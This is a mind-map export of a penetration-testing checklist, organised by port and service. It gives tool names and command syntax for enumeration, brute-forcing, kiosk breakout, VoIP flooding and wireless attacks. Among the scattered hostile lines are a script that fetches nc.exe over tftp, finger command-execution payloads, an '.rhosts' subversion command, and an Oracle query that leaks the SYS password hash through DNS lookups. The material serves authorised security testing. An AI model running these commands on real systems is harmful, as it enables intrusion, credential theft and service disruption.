Penetration Testing Framework 0.58

Get Started. It's Free
or sign up with your email address
Penetration Testing Framework 0.58 by Mind Map: Penetration Testing Framework 0.58

1. Manual Testing

1.1. Create Batch File (cmd.bat)

1.1.1. 1 cmd.exe

1.1.2. 2 echo off command echo on

1.2. Host Scripting File (cmd.vbs)

1.2.1. Option Explicit

1.2.2. Dim objShell

1.2.3. objShell.Run "%comspec% /k"

1.2.4. WScript.Quit

1.2.5. alternative functionality objShell.Run "%comspec% /k c: & dir" objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt" objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)

1.3. iKat

1.3.1. Integrated Kiosk Attack Tool Reconnaissance FileSystem Links Common Dialogs Application Handlers Browser Plugins iKAT Tools

1.4. AT Command - priviledge escalation

1.4.1. AT HH:MM /interactive "cmd.exe"

1.4.2. AT HH:MM /interactive %comspec% /k

1.4.3. Untitled

1.5. Keyboard Shortcuts/ Hotkeys

1.5.1. Ctrl + h – View History

1.5.2. Ctrl + n – New Browser

1.5.3. Shift + Left Click – New Browser

1.5.4. Ctrl + o – Internet Address (browse feature)

1.5.5. Ctrl + p – Print (to file)

1.5.6. Right Click (Shift + F10) Save Image As View Source

1.5.7. F1 – Jump to URL

1.5.8. SHIFT+F1: Local Task List

1.5.9. SHIFT+F2: Toggle Title Bar

1.5.10. SHIFT+F3: Close Remote Application

1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del

1.5.12. CTRL+F2: Remote Task List

1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC

1.5.14. ALT+F2: Cycle through programs

1.5.15. ALT+PLUS: Alt+TAB


2. inurl:Citrix/AccessPlatform/auth/login.aspx

3. X11 port 6000^ open

3.1. X11 Enumeration

3.1.1. List open windows

3.1.2. Authentication Method Xauth Xhost

3.2. X11 Exploitation

3.2.1. xwd xwd -display -root -out

3.2.2. Keystrokes Received Transmitted

3.2.3. Screenshots

3.2.4. xhost +

3.3. Examine Configuration Files

3.3.1. /etc/Xn.hosts

3.3.2. /usr/lib/X11/xdm Untitled

3.3.3. /usr/lib/X11/xdm/xsession

3.3.4. /usr/lib/X11/xdm/xsession-remote

3.3.5. /usr/lib/X11/xdm/xsession.0

3.3.6. /usr/lib/X11/xdm/xdm-config DisplayManager*authorize:on

4. pwdump [-h][-o][-u][-p] machineName

5. Nabil contributed the AS/400 section.

6. Client Side Security

7. Back end files

7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf

8. Set objShell = CreateObject("WScript.Shell")

9. Check visible areas for sensitive information.

10. InitialProgram=c:\windows\system32\cmd.exe

11. Pre-Inspection Visit - template

12. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.

12.1. Default Port Lists

12.1.1. Windows

12.1.2. *nix

12.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific

12.2.1. General Enumeration Tools nmap nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results nmap -A -sS -PN -n --script:all ip_address --reason grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list netcat nc -v -n IP_Address port nc -v -w 2 -z IP_Address port_range/port_number amap amap -bqv 80 amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...] xprobe2 xprobe2 sinfp ./ -i -p nbtscan nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>) hping hping ip_address scanrand scanrand ip_address:all unicornscan unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E netenum netenum network/netmask timeout fping fping -a -d hostname/ (Network/Subnet_Mask)

12.2.2. Firewall Specific Tools firewalk firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP] ftester host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log

12.2.3. Default Passwords (Examine list) Passwords A Passwords B Passwords C Passwords D Passwords E Passwords F Passwords G Passwords H Passwords I Passwords J Passwords K Passwords L Passwords M Passwords N Passwords O Passwords P Passwords R Passwords S Passwords T Passwords U Passwords V Passwords W Passwords X Passwords Y Passwords Z Passwords (Numeric)

12.3. Active Hosts

12.3.1. Open TCP Ports

12.3.2. Closed TCP Ports

12.3.3. Open UDP Ports

12.3.4. Closed UDP Ports

12.3.5. Service Probing SMTP Mail Bouncing Banner Grabbing Other HTTP HTTPS SMTP POP3 FTP

12.3.6. ICMP Responses Type 3 (Port Unreachable) Type 8 (Echo Request) Type 13 (Timestamp Request) Type 15 (Information Request) Type 17 (Subnet Address Mask Request) Responses from broadcast address

12.3.7. Source Port Scans TCP/UDP 53 (DNS) TCP 20 (FTP Data) TCP 80 (HTTP) TCP/UDP 88 (Kerberos)

12.3.8. Firewall Assessment Firewalk TCP/UDP/ICMP responses

12.3.9. OS Fingerprint

13. Enumeration

13.1. Daytime port 13 open

13.1.1. nmap nse script daytime

13.2. FTP port 21 open

13.2.1. Fingerprint server telnet ip_address 21 (Banner grab) Run command ftp ip_address [email protected] Check for anonymous access ftp ip_addressUsername: anonymous OR anonPassword: [email protected]

13.2.2. Password guessing Hydra brute force medusa Brutus

13.2.3. Examine configuration files ftpusers ftp.conf proftpd.conf

13.2.4. MiTM

13.3. SSH port 22 open

13.3.1. Fingerprint server telnet ip_address 22 (banner grab) scanssh scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask

13.3.2. Password guessing ssh root@ip_address guess-who ./b -l username -h ip_address -p 22 -2 < password_file_location Hydra brute force brutessh Ruby SSH Bruteforcer

13.3.3. Examine configuration files ssh_config sshd_config authorized_keys ssh_known_hosts .shosts

13.3.4. SSH Client programs tunnelier winsshd putty winscp

13.4. Telnet port 23 open

13.4.1. Fingerprint server telnet ip_address Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster telnetfp

13.4.2. Password Attack Untitled Brutus Hydra brute force telnet -l "-froot" hostname (Solaris 10+)

13.4.3. Examine configuration files /etc/xinetd.d/telnet /etc/xinetd.d/stelnet

13.5. Sendmail Port 25 open

13.5.1. Fingerprint server telnet ip_address 25 (banner grab)

13.5.2. Mail Server Testing Enumerate users VRFY username (verifies if username exists - enumeration of accounts) EXPN username (verifies if username is valid - enumeration of accounts) Mail Spoof Test HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT /etc/inetd.conf Mail Relay Test Untitled

13.5.3. Examine Configuration Files

13.6. DNS port 53 open

13.6.1. Fingerprint server/ service host host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename. nslookup nslookup [ -option ... ] [ host-to-find | - [ server ]] dig dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ] whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup

13.6.2. DNS Enumeration Bile Suite perl [website] [project_name] perl [website] [input file] perl [input file] [true domain file] [output file] <range> perl [input file] [true domain file] [output file] perl [input file] [output file] perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names] perl jarf-rev [subnetblock] [nameserver] txdns txdns -rt -t domain_name txdns -x 50 -bb domain_name nmap nse scripts dns-random-srcport dns-random-txid dns-recursion dns-zone-transfer

13.6.3. Examine Configuration Files host.conf resolv.conf named.conf

13.7. perl [ip_address_file] [output_file]

13.8. TFTP port 69 open

13.8.1. TFTP Enumeration tftp ip_address PUT local_file tftp ip_address GET conf.txt (or other files) Solarwinds TFTP server tftp – i <IP> GET /etc/passwd (old Solaris)

13.8.2. TFTP Bruteforcing TFTP bruteforcer Cisco-Torch

13.9. Finger Port 79 open

13.9.1. User enumeration finger 'a b c d e f g h' finger [email protected] finger [email protected] finger [email protected] finger [email protected] finger ** finger [email protected] finger nmap nse script finger

13.9.2. Command execution finger "|/bin/[email protected]" finger "|/bin/ls -a /"

13.9.3. Finger Bounce finger user@host@victim finger @internal@external

13.10. Web Ports 80,8080 etc. open

13.10.1. Fingerprint server Telnet ip_address port Firefox plugins All Specific

13.10.2. Crawl website lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source httprint Metagoofil -d [domain] -l [no. of] -f [type] -o results.html

13.10.3. Web Directory enumeration Nikto nikto [-h target] [options] DirBuster Wikto Goolag Scanner

13.10.4. Vulnerability Assessment Manual Tests Default Passwords Install Backdoors Method Testing Upload Files View Page Source Input Validation Checks Automated table and column iteration Vulnerability Scanners Acunetix Grendelscan NStealth Obiwan III w3af Specific Applications/ Server Tools Domino Joomla Vbulletin ZyXel

13.10.5. Proxy Testing Burpsuite Crowbar Interceptor Paros Requester Raw Suru WebScarab

13.10.6. Examine configuration files Generic Examine httpd.conf/ windows config files JBoss JMX Console http://<IP>:8080/jmxconcole/ Joomla configuration.php diagnostics.php Mambo configuration.php Wordpress setup-config.php wp-config.php ZyXel /WAN.html (contains PPPoE ISP password) /WLAN_General.html and /WLAN.html (contains WEP key) /rpDyDNS.html (contains DDNS credentials) /Firewall_DefPolicy.html (Firewall) /CF_Keyword.html (Content Filter) /RemMagWWW.html (Remote MGMT) /rpSysAdmin.html (System) /LAN_IP.html (LAN) /NAT_General.html (NAT) /ViewLog.html (Logs) /rpFWUpload.html (Tools) /DiagGeneral.html (Diagnostic) /RemMagSNMP.html (SNMP Passwords) /LAN_ClientList.html (Current DHCP Leases) Config Backups

13.10.7. Examine web server logs c:\winnt\system32\Logfiles\W3SVC1 awk -F " " '{print $3,$11} filename | sort | uniq

13.10.8. References White Papers Cross Site Request Forgery: An Introduction to a Common Web Application Weakness Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity Blind Security Testing - An Evolutionary Approach Command Injection in XML Signatures and Encryption Input Validation Cheat Sheet SQL Injection Cheat Sheet Books Hacking Exposed Web 2.0 Hacking Exposed Web Applications The Web Application Hacker's Handbook

13.10.9. Exploit Frameworks Brute-force Tools Acunetix Metasploit w3af

13.11. Portmapper port 111 open

13.11.1. username:password@IP_Address port/protocol (i.e. 80/HTTP)

13.11.2. rpcinfo rpcinfo [options] IP_Address

13.12. NTP Port 123 open

13.12.1. NTP Enumeration ntpdc -c monlist IP_ADDRESS ntpdc -c sysinfo IP_ADDRESS ntpq host hostname ntpversion readlist version

13.12.2. Examine configuration files ntp.conf

13.12.3. nmap nse script ntp-info

13.13. NetBIOS Ports 135-139,445 open

13.13.1. NetBIOS enumeration Enum enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip> Null Session net use \\\ipc$ "" /u:"" Smbclient smbclient -L //server/share password options Superscan Enumeration tab. user2sid/sid2user Winfo

13.13.2. NetBIOS brute force Hydra Brutus Cain & Abel getacct NAT (NetBIOS Auditing Tool)

13.13.3. Examine Configuration Files Smb.conf lmhosts

13.14. SNMP port 161 open

13.14.1. Default Community Strings public private cisco cable-docsis ILMI

13.14.2. MIB enumeration Windows NT . Hostnames . Domain Name . Usernames . Running Services . Share Information Solarwinds MIB walk Getif snmpwalk snmpwalk -v <Version> -c <Community string> <IP> Snscan Applications ZyXel nmap nse script snmp-sysdescr

13.14.3. SNMP Bruteforce onesixtyone onesixytone -c SNMP.wordlist <IP> cat ./cat -h <IP> -w SNMP.wordlist Solarwinds SNMP Brute Force ADMsnmp nmap nse script snmp-brute

13.14.4. Examine SNMP Configuration files snmp.conf snmpd.conf snmp-config.xml

13.15. LDAP Port 389 Open

13.15.1. ldap enumeration ldapminer ldapminer -h ip_address -p port (not required if default) -d luma Gui based tool ldp Gui based tool openldap ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...] ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn] ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file] ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]

13.15.2. ldap brute force bf_ldap bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,) K0ldS

13.15.3. Examine Configuration Files General containers.ldif ldap.cfg ldap.conf ldap.xml ldap-config.xml ldap-realm.xml slapd.conf IBM SecureWay V3 server Microsoft Active Directory server msadClassesAttrs.ldif Netscape Directory Server 4 nsslapd.sas_at.conf nsslapd.sas_oc.conf OpenLDAP directory server slapd.sas_at.conf slapd.sas_oc.conf Sun ONE Directory Server 5.1 75sas.ldif

13.16. PPTP/L2TP/VPN port 500/1723 open

13.16.1. Enumeration ike-scan ike-probe

13.16.2. Brute-Force ike-crack

13.16.3. Reference Material PSK cracking paper SecurityFocus Infocus Scanning a VPN Implementation

13.17. Modbus port 502 open

13.17.1. modscan

13.18. rlogin port 513 open

13.18.1. Rlogin Enumeration Find the files find / -name .rhosts locate .rhosts Examine Files cat .rhosts Manual Login rlogin hostname -l username rlogin <IP> Subvert the files echo ++ > .rhosts

13.18.2. Rlogin Brute force Hydra

13.19. rsh port 514 open

13.19.1. Rsh Enumeration rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command

13.19.2. Rsh Brute Force rsh-grind Hydra medusa

13.20. SQL Server Port 1433 1434 open

13.20.1. SQL Enumeration piggy SQLPing sqlping ip_address/hostname SQLPing2 SQLPing3 SQLpoke SQL Recon SQLver

13.20.2. SQL Brute Force SQLPAT sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack sqlbf -u hashes.txt -c -r out.rep - Brute-Force Attack SQL Dict SQLAT Hydra SQLlhf ForceSQL

13.21. Citrix port 1494 open

13.21.1. Citrix Enumeration Default Domain Published Applications ./citrix-pa-scan {IP_address/file | - | random} [timeout] IP_to_proxy_to [Local_IP]

13.21.2. Citrix Brute Force bforce.js connect.js Citrix Brute-forcer Reference Material Hacking Citrix - the legitimate backdoor Hacking Citrix - the forceful way

13.22. Oracle Port 1521 Open

13.22.1. Oracle Enumeration oracsec Repscan Sidguess Scuba DNS/HTTP Enumeration SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'') FROM DUAL Untitled WinSID Oracle default password list TNSVer tnsver host [port] TCP Scan Oracle TNSLSNR Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop] TNSCmd perl -h ip_address perl version -h ip_address perl status -h ip_address perl -h ip_address --cmdsize (40 - 200) LSNrCheck Oracle Security Check (needs credentials) OAT sh -s ip_address opwg.bat -s ip_address sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID OScanner sh -s ip_address oscanner.exe -s ip_address sh oscanner_saved_file.xml reportviewer.exe oscanner_saved_file.xml NGS Squirrel for Oracle Service Register Service-register.exe ip_address PLSQL Scanner 2008

13.22.2. Oracle Brute Force OAK ora-getsid hostname port sid_dictionary_list ora-auth-alter-session host port sid username password sql ora-brutesid host port start ora-pwdbrute host port sid username password-file ora-userenum host port sid userlistfile ora-ver -e (-f -l -a) host port breakable (Targets Application Server Port) breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose SQLInjector (Targets Application Server Port) sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle Check Password orabf orabf [hash]:[username] [options] thc-orakel Cracker Client Crypto DBVisualisor Sql scripts from Manual sql input of previously reported vulnerabilties

13.22.3. Oracle Reference Material Understanding SQL Injection SQL Injection walkthrough SQL Injection by example Advanced SQL Injection in Oracle databases Blind SQL Injection SQL Cheatsheets Untitled

13.23. NFS Port 2049 open

13.23.1. NFS Enumeration showmount -e hostname/ip_address mount -t nfs ip_address:/directory_found_exported /local_mount_point

13.23.2. NFS Brute Force Interact with NFS share and try to add/delete Exploit and Confuse Unix

13.23.3. Examine Configuration Files /etc/exports /etc/lib/nfs/xtab

13.23.4. nmap nse script nfs-showmount

13.24. Compaq/HP Insight Manager Port 2301,2381open

13.24.1. HP Enumeration Authentication Method Host OS Authentication Default Authentication Wikto Nstealth

13.24.2. HP Bruteforce Hydra Acunetix

13.24.3. Examine Configuration Files mx.log CLIClientConfig.cfg database.props pg_hba.conf jboss-service.xml .namazurc

13.25. MySQL port 3306 open

13.25.1. Enumeration nmap -A -n -p3306 <IP Address> nmap -A -n -PN --script:ALL -p3306 <IP Address> telnet IP_Address 3306 use test; select * from test; To check for other DB's -- show databases

13.25.2. Administration MySQL Network Scanner MySQL GUI Tools mysqlshow mysqlbinlog

13.25.3. Manual Checks Default usernames and passwords username: root password: testing Configuration Files Operating System Command History Log Files To run many sql commands at once -- mysql -u username -p < manycommands.sql MySQL data directory (Location specified in my.cnf) SSL Check Privilege Escalation Current Level of access Access passwords Create a new user and grant him privileges Break into a shell

13.25.4. SQL injection http://target/ expected_string database

13.25.5. References. Design Weaknesses MySQL running as root Exposed publicly on Internet

13.26. RDesktop port 3389 open

13.26.1. Rdesktop Enumeration Remote Desktop Connection

13.26.2. Rdestop Bruteforce TSGrinder tsgrinder.exe -w dictionary_file -l leet -d workgroup -u administrator -b -n 2 IP_Address Tscrack

13.27. Sybase Port 5000+ open

13.27.1. Sybase Enumeration sybase-version ip_address from NGS

13.27.2. Sybase Vulnerability Assessment Use DBVisualiser Sybase Security checksheet Manual sql input of previously reported vulnerabilties NGS Squirrel for Sybase

13.28. SIP Port 5060 open

13.28.1. SIP Enumeration netcat nc IP_Address Port sipflanker python 192.168.1-254 Sipscan smap smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

13.28.2. SIP Packet Crafting etc. sipsak Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain siprogue

13.28.3. SIP Vulnerability Scanning/ Brute Force tftp bruteforcer Default dictionary file ./ IP_Address Dictionary_file Maximum_Processes VoIPaudit SiVuS

13.28.4. Examine Configuration Files SIPDefault.cnf asterisk.conf sip.conf phone.conf sip_notify.conf <Ethernet address>.cfg 000000000000.cfg phone1.cfg sip.cfg etc. etc.

13.29. VNC port 5900^ open

13.29.1. VNC Enumeration Scans 5900^ for direct access.5800 for HTTP access.

13.29.2. VNC Brute Force Password Attacks Remote Local

13.29.3. Exmine Configuration Files .vnc /etc/vnc/config $HOME/.vnc/config /etc/sysconfig/vncservers /etc/vnc.conf

13.30. Tor Port 9001, 9030 open

13.30.1. Tor Node Checker Ip Pages

13.30.2. nmap NSE script

13.31. Jet Direct 9100 open

13.31.1. hijetta

14. VoIP Security

14.1. Sniffing Tools

14.1.1. AuthTool

14.1.2. Cain & Abel

14.1.3. Etherpeek

14.1.4. NetDude

14.1.5. Oreka

14.1.6. PSIPDump

14.1.7. SIPomatic

14.1.8. SIPv6 Analyzer

14.1.9. UCSniff

14.1.10. VoiPong

14.1.11. VOMIT

14.1.12. Wireshark

14.1.13. WIST - Web Interface for SIP Trace

14.2. Scanning and Enumeration Tools

14.2.1. enumIAX

14.2.2. fping

14.2.3. IAX Enumerator

14.2.4. iWar

14.2.5. Nessus

14.2.6. Nmap

14.2.7. SIP Forum Test Framework (SFTF)

14.2.8. SIPcrack

14.2.9. sipflanker python 192.168.1-254

14.2.10. SIP-Scan

14.2.11. SIP.Tastic

14.2.12. SIPVicious

14.2.13. SiVuS

14.2.14. SMAP smap IP_Address/Subnet_Mask smap -o IP_Address/Subnet_Mask smap -l IP_Address

14.2.15. snmpwalk

14.2.16. VLANping

14.2.17. VoIPAudit

14.2.18. VoIP GHDB Entries

14.2.19. VoIP Voicemail Database

14.3. Packet Creation and Flooding Tools

14.3.1. H.323 Injection Files

14.3.2. H225regreject

14.3.3. IAXHangup

14.3.4. IAXAuthJack

14.3.5. IAX.Brute

14.3.6. IAXFlooder ./iaxflood sourcename destinationname numpackets

14.3.7. INVITE Flooder ./inviteflood interface target_user target_domain ip_address_target no_of_packets

14.3.8. kphone-ddos

14.3.9. RTP Flooder

14.3.10. rtpbreak

14.3.11. Scapy

14.3.12. Seagull

14.3.13. SIPBomber

14.3.14. SIPNess

14.3.15. SIPp

14.3.16. SIPsak Tracing paths: - sipsak -T -s sip:usernaem@domain Options request:- sipsak -vv -s sip:username@domain Query registered bindings:- sipsak -I -C empty -a password -s sip:username@domain

14.3.17. SIP-Send-Fun

14.3.18. SIPVicious

14.3.19. Spitter

14.3.20. TFTP Brute Force perl <tftpserver> <filelist> <maxprocesses>

14.3.21. UDP Flooder ./udpflood source_ip target_destination_ip src_port dest_port no_of_packets

14.3.22. UDP Flooder (with VLAN Support) ./udpflood source_ip target_destination_ip src_port dest_port TOS user_priority VLAN ID no_of_packets

14.3.23. Voiphopper

14.4. Fuzzing Tools

14.4.1. Asteroid

14.4.2. Codenomicon VoIP Fuzzers

14.4.3. Fuzzy Packet

14.4.4. Mu Security VoIP Fuzzing Platform

14.4.5. ohrwurm RTP Fuzzer

14.4.6. PROTOS H.323 Fuzzer

14.4.7. PROTOS SIP Fuzzer

14.4.8. SIP Forum Test Framework (SFTF)

14.4.9. Sip-Proxy

14.5. Signaling Manipulation Tools

14.5.1. AuthTool ./authtool captured_sip_msgs_file -d dictionary -r usernames_passwords -v

14.5.2. BYE Teardown

14.5.3. Check Sync Phone Rebooter

14.5.4. RedirectPoison

14.5.5. Registration Adder

14.5.6. Registration Eraser

14.5.7. Registration Hijacker

14.5.8. SIP-Kill

14.5.9. SIP-Proxy-Kill

14.5.10. SIP-RedirectRTP

14.5.11. vnak

14.6. Media Manipulation Tools

14.6.1. RTP InsertSound ./rtpinsertsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.2. RTP MixSound ./rtpmixsound interface source_rtp_ip source_rtp_port destination_rtp_ip destination_rtp_port file

14.6.3. RTPProxy

14.6.4. RTPInject

14.7. Generic Software Suites

14.7.1. OAT Office Communication Server Tool Assessment

14.7.2. EnableSecurity VOIPPACK Note: - Add-on for Immunity Canvas

14.8. References

14.8.1. URL's Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here: Default Passwords Hacking Exposed VoIP Tool Pre-requisites VoIPsa

14.8.2. White Papers An Analysis of Security Threats and Tools in SIP-Based VoIP Systems An Analysis of VoIP Security Threats and Tools Hacking VoIP Exposed Security testing of SIP implementations SIP Stack Fingerprinting and Stack Difference Attacks Two attacks against VoIP VoIP Attacks! VoIP Security Audit Program (VSAP)

14.8.3. Spirent ThreatEx

15. Wireless Penetration

15.1. Wireless Assessment. The following information should ideally be obtained/enumerated when carrying out your wireless assessment. All this information is needed to give the tester, (and hence, the customer), a clear and concise picture of the network you are assessing. A brief overview of the network during a pre-site meeting weith the customer should allow you to estimate the timescales required to carry the assessment out.

15.1.1. Site Map RF Map Lines of Sight Signal Coverage Physical Map Triangulate APs Satellite Imagery

15.1.2. Network Map MAC Filter Authorised MAC Addresses Reaction to Spoofed MAC Addresses Encryption Keys utilised WEP WPA/PSK 802.1x Access Points ESSID BSSIDs Wireless Clients MAC Addresses Intercepted Traffic

15.2. SipRogue

15.3. ./redirectpoison interface target_source_ip target_source_port "<contact_information i.e. sip:;line=xtrfgy>"

15.4. Wireless Toolkit

15.4.1. Wireless Discovery Aerosol Airfart Aphopper Apradar BAFFLE inSSIDer iWEPPro karma KisMAC-ng Kismet MiniStumbler Netstumbler Vistumbler Wellenreiter Wifi Hopper WirelessMon WiFiFoFum

15.4.2. Packet Capture Airopeek Airpcap Airtraf Apsniff Cain Commview Ettercap Netmon nmwifi Wireshark

15.4.3. EAP Attack tools eapmd5pass eapmd5pass -w dictionary_file -r eapmd5-capture.dump Untitled

15.4.4. Leap Attack Tools asleap thc leap cracker anwrap

15.4.5. WEP/ WPA Password Attack Tools Airbase Aircrack-ptw Aircrack-ng Airsnort cowpatty FiOS Wireless Key Calculator iWifiHack KisMAC-ng Rainbow Tables wep attack wep crack wzcook

15.4.6. Frame Generation Software Airgobbler airpwn Airsnarf Commview fake ap void 11 wifi tap wifitap -b <BSSID> [-o <iface>] [-i <iface> [-p] [-w <WEP key> [-k <key id>]] [-d [-v]] [-h] FreeRADIUS - Wireless Pwnage Edition

15.4.7. Mapping Software Online Mapping WIGLE Skyhook Tools Knsgem

15.4.8. File Format Conversion Tools ns1 recovery and conversion tool warbable warkizniz warkizniz04b.exe [kismet.csv] [kismet.gps] [ns1 filename] ivstools

15.4.9. IDS Tools WIDZ War Scanner Snort-Wireless AirDefense AirMagnet

15.5. WLAN discovery

15.5.1. Unencrypted WLAN Visible SSID Sniff for IP range Hidden SSID Deauth client

15.5.2. WEP encrypted WLAN Visible SSID WEPattack Hidden SSID Deauth client

15.5.3. WPA / WPA2 encrypted WLAN Deauth client Capture EAPOL handshake

15.5.4. LEAP encrypted WLAN Deauth client Break LEAP

15.5.5. 802.1x WLAN Create Rogue Access Point Airsnarf fake ap Hotspotter Karma Linux rogue AP

15.5.6. Resources URL's Russix Wireless Vulnerabilities and Exploits (WVE) White Papers Weaknesses in the Key Scheduling Algorithm of RC4 802.11b Firmware-Level Attacks Wireless Attacks from an Intrusion Detection Perspective Implementing a Secure Wireless Network for a Windows Environment Breaking 104 bit WEP in less than 60 seconds PEAP Shmoocon2008 Wright & Antoniewicz Active behavioral fingerprinting of wireless devices Common Vulnerabilities and Exploits (CVE) Vulnerabilties and exploit information relating to these products can be found here:

16. txdns --verbose -fm wordlist.dic --server ip_address -rr SOA domain_name -h c: \hostlist.txt


